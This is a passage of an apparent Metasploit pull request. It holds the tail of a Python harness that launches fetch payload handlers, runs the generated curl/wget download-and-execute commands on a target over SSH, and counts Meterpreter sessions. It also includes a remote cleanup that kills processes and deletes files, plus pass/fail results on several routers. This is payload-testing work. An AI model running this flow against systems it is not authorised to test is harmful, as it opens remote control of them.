        for m in re.finditer(
            r'(Meterpreter session \d+ opened \(([^)]+)\) at .+)', content
        ):
            session_str = m.group(1)
            conn = m.group(2)
            lp_match = re.search(r':(\d+) ->', conn)
            if lp_match:
                lp = int(lp_match.group(1))
                if lp in wanted and lp not in found:
                    found[lp] = session_str
        for m in re.finditer(
            r'meterpreter\s+\S+.*?(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)',
            content
        ):
            lp = int(m.group(2))
            if lp in wanted and lp not in found:
                found[lp] = f"session via sessions-l ({m.group(1)}:{lp} -> {m.group(3)}:{m.group(4)})"
        if len(found) == len(wanted):
            break
        time.sleep(2)
    return found


def kill_lingering(port):
    result = subprocess.run(
        ['ss', '-tlnp', f'sport = :{port}'],
        capture_output=True, text=True,
    )
    for pid_match in re.finditer(r'pid=(\d+)', result.stdout):
        pid = int(pid_match.group(1))
        try:
            os.kill(pid, 9)
            log(f"  killed pid {pid} on port {port}")
        except ProcessLookupError:
            pass


def cleanup_target():
    log("[CLEANUP] Killing lingering test processes and removing stale binaries on target...")
    try:
        ssh_run(
            f"for pid in $(ss -tnap dst {LHOST} 2>/dev/null "
            f"| grep -oP 'pid=\\K[0-9]+' | sort -u); do kill -9 $pid 2>/dev/null; done; "
            "for pid in $(ls /proc 2>/dev/null | grep -E '^[0-9]+$'); do "
            "  readlink /proc/$pid/exe 2>/dev/null | grep -qE '(memfd|/http_|/https_)' && kill -9 $pid 2>/dev/null; "
            "done"
        )
        time.sleep(5)
        out, err = ssh_run(
            f"for pid in $(ss -tnap dst {LHOST} 2>/dev/null "
            f"| grep -oP 'pid=\\K[0-9]+' | sort -u); do kill -9 $pid 2>/dev/null; done; "
            "for pid in $(ls /proc 2>/dev/null | grep -E '^[0-9]+$'); do "
            "  readlink /proc/$pid/exe 2>/dev/null | grep -qE '(memfd|/http_|/https_)' && kill -9 $pid 2>/dev/null; "
            "done; "
            "sleep 1; "
            "rm -f ./http_* ./https_* /tmp/http_* /tmp/https_* 2>/dev/null; "
            r"find ~ /tmp -maxdepth 1 -type f -regex '.*/[A-Za-z]\{8,12\}$' -delete 2>/dev/null; "
            "echo done"
        )
        log(f"[CLEANUP] {out or 'ok'}")
    except Exception as exc:
        log(f"[CLEANUP] Warning: {exc}")


def run_proto_group(proto_name):
    tests = TESTS_BY_PROTO[proto_name]
    n = len(tests)
    log_file = _proto_log_path(proto_name)

    results = {t['lport']: {
        'test': t, 'passed': False, 'session': None,
        'target_cmd': None, 'error': None,
    } for t in tests}

    log(f"[{proto_name}] Starting {n} tests")

    for t in tests:
        kill_lingering(t['lport'])
        kill_lingering(t['fetch_srvport'])

    rc_file = write_proto_rc(proto_name, tests)
    proc = run_msf(rc_file, log_file)

    content = wait_for_n_handlers(log_file, n, timeout=180)
    if content is None:
        for t in tests:
            results[t['lport']]['error'] = 'Handlers did not all start within timeout'
        proc.terminate()
        return list(results.values())

    if 'Exploit failed' in content or 'failed to bind' in content:
        for t in tests:
            results[t['lport']]['error'] = 'Handler setup failed'
        proc.terminate()
        return list(results.values())

    cmds = parse_n_target_commands(content, n)
    if len(cmds) < n:
        for t in tests:
            results[t['lport']]['error'] = f"Only got {len(cmds)}/{n} target commands"
        proc.terminate()
        return list(results.values())

    for t, cmd in zip(tests, cmds):
        results[t['lport']]['target_cmd'] = cmd
        log(f"[CMD] {t['name']}: {cmd}")

    def _ssh(pair):
        t, cmd = pair
        try:
            ssh_run(cmd)
            return t, None
        except Exception as exc:
            return t, str(exc)

    with concurrent.futures.ThreadPoolExecutor(max_workers=n) as ex:
        for future in concurrent.futures.as_completed(
            ex.submit(_ssh, (t, results[t['lport']]['target_cmd'])) for t in tests
        ):
            t, err = future.result()
            if err:
                results[t['lport']]['error'] = f"SSH error: {err}"
                log(f"[SSH-ERR] {t['name']}: {err}")

    lports = [t['lport'] for t in tests]
    sessions = wait_for_sessions(log_file, lports, timeout=480)

    proc.terminate()
    try:
        proc.wait(timeout=10)
    except subprocess.TimeoutExpired:
        proc.kill()

    for t in tests:
        lp = t['lport']
        if lp in sessions:
            results[lp]['passed'] = True
            results[lp]['session'] = sessions[lp]
            print(f"[PASS] {t['name']}: {sessions[lp]}")
        elif results[lp]['error'] is None:
            results[lp]['error'] = 'No Meterpreter session within timeout'
            print(f"[FAIL] {t['name']}: No session within timeout")

    return list(results.values())


def _matrix(results, pipe_val):
    subset = [r for r in results if r['test']['pipe'] == pipe_val]
    if not subset:
        return
    row_keys = list(dict.fromkeys(
        (r['test']['proto'], r['test']['fetch_command']) for r in subset
    ))
    col_w = max(len(f) for f in FILELESS_VALUES) + 2
    row_label_w = max(len(f"{p}/{c}") for p, c in row_keys) + 2
    label = 'true' if pipe_val else 'false'
    print(f"  FETCH_PIPE = {label}")
    print(f"  {'':<{row_label_w}}" + ''.join(f"{f:^{col_w}}" for f in FILELESS_VALUES))
    print(f"  {'-'*row_label_w}" + '-' * (col_w * len(FILELESS_VALUES)))
    by_key = {
        (r['test']['proto'], r['test']['fetch_command'], r['test']['fileless']): r
        for r in subset
    }
    for proto, fetch_cmd in row_keys:
        row_label = f"{proto}/{fetch_cmd}"
        row = f"  {row_label:<{row_label_w}}"
        for fl in FILELESS_VALUES:
            r = by_key.get((proto, fetch_cmd, fl))
            cell = 'PASS' if (r and r['passed']) else ('FAIL' if r else 'N/A ')
            row += f"{cell:^{col_w}}"
        print(row)
    print()


def print_summary(results):
    print(f"\n{'='*60}")
    print("RESULTS SUMMARY")
    print(f"{'='*60}\n")

    for pipe_val in PIPE_VALUES:
        _matrix(results, pipe_val)

    for r in results:
        t = r['test']
        status = 'PASS' if r['passed'] else 'FAIL'
        print(f"  [{status}] {t['name']}")
        print(f"    Payload       : {t['payload']}")
        print(f"    LHOST         : {LHOST}   LPORT: {t['lport']}")
        print(f"    FETCH_COMMAND : {t['fetch_command']}   FETCH_SRVPORT: {t['fetch_srvport']}")
        print(f"    FETCH_FILELESS: {t['fileless']}")
        print(f"    FETCH_PIPE    : {'true' if t['pipe'] else 'false'}")
        print(f"    FETCH_URIPATH : {t['fetch_uripath']}")
        skip = {'FETCH_FILELESS', 'FETCH_PIPE', 'FETCH_COMMAND'}
        for opt in t['extra_opts']:
            key, _, val = opt.replace('set ', '', 1).partition(' ')
            if key in skip:
                continue
            print(f"    {key:<14}: {val}")
        if r['target_cmd']:
            print(f"    Target cmd    : {r['target_cmd']}")
        if r['session']:
            print(f"    Session       : {r['session']}")
        if r['error']:
            print(f"    Error         : {r['error']}")
        print()

    passed = sum(r['passed'] for r in results)
    print(f"Overall: {passed}/{len(results)} passed")
    return 0 if passed == len(results) else 1


def main():
    global LHOST, MSF_PATH, TARGET_HOST, TARGET_USER, TARGET_PASS, TARGET_PORT, _BASE_PORT, LOG_FILE, TESTS, TESTS_BY_PROTO

    parser = argparse.ArgumentParser(description='Test MSF fetch multi payloads')
    parser.add_argument('--lhost', required=True,
                        help='MSF listening host (IP address reachable from target)')
    parser.add_argument('--msf-path', default='/home/tmoose/git/metasploit-framework',
                        help='Path to metasploit-framework checkout')
    parser.add_argument('--target-host', default=None,
                        help='SSH target host')
    parser.add_argument('--target-user', default=None,
                        help='SSH target username')
    parser.add_argument('--target-pass', default=None,
                        help='SSH target password (prompted if omitted)')
    parser.add_argument('--target-port', type=int, default=22,
                        help='SSH port on the target host (default: 22)')
    parser.add_argument('--port-base', type=int, default=random.randint(10000, 60000),
                        help='Base port for this run (default: random in 10000-60000). '
                             'Space concurrent instances at least 60 ports apart.')
    parser.add_argument('--concurrent-threads', type=int, default=8,
                        help='Max concurrent SSH connections to the target (default: 8). '
                             'Lower this if the target SSH daemon resets connections under load.')
    args = parser.parse_args()

    LHOST    = args.lhost
    MSF_PATH = args.msf_path
    TARGET_HOST = args.target_host or input('Target host: ').strip()
    TARGET_USER = args.target_user or input('Target user: ').strip()
    TARGET_PASS = args.target_pass or getpass.getpass('Target password: ')
    TARGET_PORT = args.target_port

    global _ssh_sem
    _ssh_sem = threading.Semaphore(args.concurrent_threads)

    _BASE_PORT = args.port_base
    LOG_FILE   = f'/tmp/fetch_multi_test_{_BASE_PORT}.log'

    global _log_fh
    _log_fh = open(LOG_FILE, 'w')
    print(f"Logging verbose output to {LOG_FILE}")

    global FILELESS_VALUES
    if 'python3.8+' in FILELESS_VALUES and not target_supports_python38():
        msg = "Target lacks Python 3.8+; skipping python3.8+ FETCH_FILELESS tests"
        log(f"[CHECK] {msg}")
        print(msg)
        FILELESS_VALUES = [v for v in FILELESS_VALUES if v != 'python3.8+']

    TESTS      = build_tests(_BASE_PORT)
    TESTS_BY_PROTO = {}
    for t in TESTS:
        TESTS_BY_PROTO.setdefault(t['proto'], []).append(t)

    try:
        cleanup_target()
        order = {t['name']: i for i, t in enumerate(TESTS)}
        proto_names = list(TESTS_BY_PROTO.keys())

        with concurrent.futures.ThreadPoolExecutor(max_workers=len(proto_names)) as executor:
            futures = {executor.submit(run_proto_group, name): name for name in proto_names}
            all_results = []
            for f in concurrent.futures.as_completed(futures):
                all_results.extend(f.result())

        all_results.sort(key=lambda r: order[r['test']['name']])
        return print_summary(all_results)
    finally:
        _log_fh.close()


if __name__ == '__main__':
    sys.exit(main())

```

</details>

Also, please remember to test with fetch payloads only having the uname value.


## Test Evidence

<details><summary>Ubuntu 24.04x64</summary>

```
============================================================
RESULTS SUMMARY
============================================================

  FETCH_PIPE = false
                  none     python3.8+ 
  ------------------------------------
  HTTP/CURL       PASS        PASS    
  HTTP/WGET       PASS        PASS    
  HTTPS/CURL      PASS        PASS    
  HTTPS/WGET      PASS        PASS    

  FETCH_PIPE = true
                  none     python3.8+ 
  ------------------------------------
  HTTP/CURL       PASS        PASS    
  HTTP/WGET       PASS        PASS    
  HTTPS/CURL      PASS        PASS    
  HTTPS/WGET      PASS        PASS    

```
</details>

<details><summary>Ubiquiti EdgerouterX- mipsel</summary>


**WGET not present on host, so WGET payloads are expected to fail.**

```
============================================================
RESULTS SUMMARY
============================================================

  FETCH_PIPE = false
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    FAIL 
  HTTPS/CURL   PASS 
  HTTPS/WGET   FAIL 

  FETCH_PIPE = true
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    FAIL 
  HTTPS/CURL   PASS 
  HTTPS/WGET   FAIL 

```

</details>

<details><summary>Ubiquiti Edgerouter4- mips64</summary>

**No WGET Present; WGET payloads expected to fail**

```
============================================================
RESULTS SUMMARY
============================================================

  FETCH_PIPE = false
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    FAIL 
  HTTPS/CURL   PASS 
  HTTPS/WGET   FAIL 

  FETCH_PIPE = true
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    FAIL 
  HTTPS/CURL   PASS 
  HTTPS/WGET   FAIL 


```

</details>


<details><summary>GLiNET AR300M- mipsel</summary>

dropbear ssh can only run 2 concurrent sessions- use `--concurrent-threads 2` with test script to limit concurrent sessions.

```
============================================================
RESULTS SUMMARY
============================================================

  FETCH_PIPE = false
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    PASS 
  HTTPS/CURL   PASS 
  HTTPS/WGET   PASS 

  FETCH_PIPE = true
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    PASS 
  HTTPS/CURL   PASS 
  HTTPS/WGET   PASS 

```

</details>

<details><summary>Busybox Linux mipsbe 6.18.7- VM</summary>

dropbear ssh can only run 2 concurrent sessions- use `--concurrent-threads 2` with test script to limit concurrent sessions and --target-port 2223 as it is NAT'd.
Looks like the --no-check-certificate option is not supported on this host's wget, so HTTPS fails.

```
============================================================
RESULTS SUMMARY
============================================================

  FETCH_PIPE = false
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    PASS 
  HTTPS/CURL   PASS 
  HTTPS/WGET   FAIL 

  FETCH_PIPE = true
               none 
  ------------------
  HTTP/CURL    PASS 
  HTTP/WGET    PASS 
  HTTPS/CURL   PASS 
  HTTPS/WGET   FAIL 

```

</details>

## Environment

Multiple

## AI Usage Disclosure

I used Claude to code the test scripts, review code and generate spec tests.



## Pre-Submission Checklist

- [ ] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

